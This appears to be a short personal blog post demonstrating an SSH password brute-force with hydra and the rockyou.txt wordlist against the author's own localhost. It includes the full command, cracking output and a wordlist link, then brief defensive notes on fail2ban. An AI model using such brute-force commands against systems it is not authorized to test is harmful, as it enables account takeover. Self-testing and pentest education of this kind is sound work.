Posted: . At: 2:52 PM. This was 9 years ago. Post ID: 8308
Page permalink. WordPress uses cookies, or tiny pieces of information stored on your computer, to verify who you are. There are cookies for logged in users and for commenters.
These cookies expire two weeks after they are set.

Cracking an SSH login using hydra on Debian GNU/Linux.

The hydra brute forcing program allows a user to attack a login trying many passwords until the correct login information is discovered. I have tried this on localhost and I managed to crack the password for my SSH login on my laptop. I used rockyou.txt downloaded from this website and I had to add my password to this file so that it would be found. Using as large a wordlist as you can will be a good idea. And this was the command used.

hydra -t 5 -V -f -l jason -P rockyou.txt localhost ssh

This allowed me to crack the SSH password in no time at all.

jason@darkstar:~/Downloads$ hydra -t 5 -V -f -l jason -P rockyou.txt localhost ssh
Hydra v8.0 (c) 2014 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes.
 
Hydra (http://www.thc.org/thc-hydra) starting at 2015-08-07 14:38:32
[DATA] max 5 tasks per 1 server, overall 5 tasks, 14344401 login tries (l:1/p:14344401), ~573776 tries per task
[DATA] attacking service ssh on port 22
[ATTEMPT] target localhost - login "jason" - pass "123456" - 1 of 14344401 [child 0]
[ATTEMPT] target localhost - login "jason" - pass "12345" - 2 of 14344401 [child 1]
[ATTEMPT] target localhost - login "jason" - pass "302c64&*(" - 3 of 14344401 [child 2]
[ATTEMPT] target localhost - login "jason" - pass "ff302c64FFG" - 4 of 14344401 [child 3]
[ATTEMPT] target localhost - login "jason" - pass "302c64&*(FFG" - 5 of 14344401 [child 4]
[22][ssh] host: 127.0.0.1   login: jason   password: 302c64&*(
[STATUS] attack finished for localhost (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-08-07 14:38:34

This is therefore a good way to test SSH security. But the use of SSH host keys would make this harder. if fail2ban was installed and configured,then this would negate the brute force attacks by blocking repeat offenders in iptables. This is a valid tool for pentesting though.

Download rockyou.txt: https://github.com/praetorian-inc/Hob0Rules/raw/master/wordlists/rockyou.txt.gz.

2 thoughts on “Cracking an SSH login using hydra on Debian GNU/Linux.”

Leave a Comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.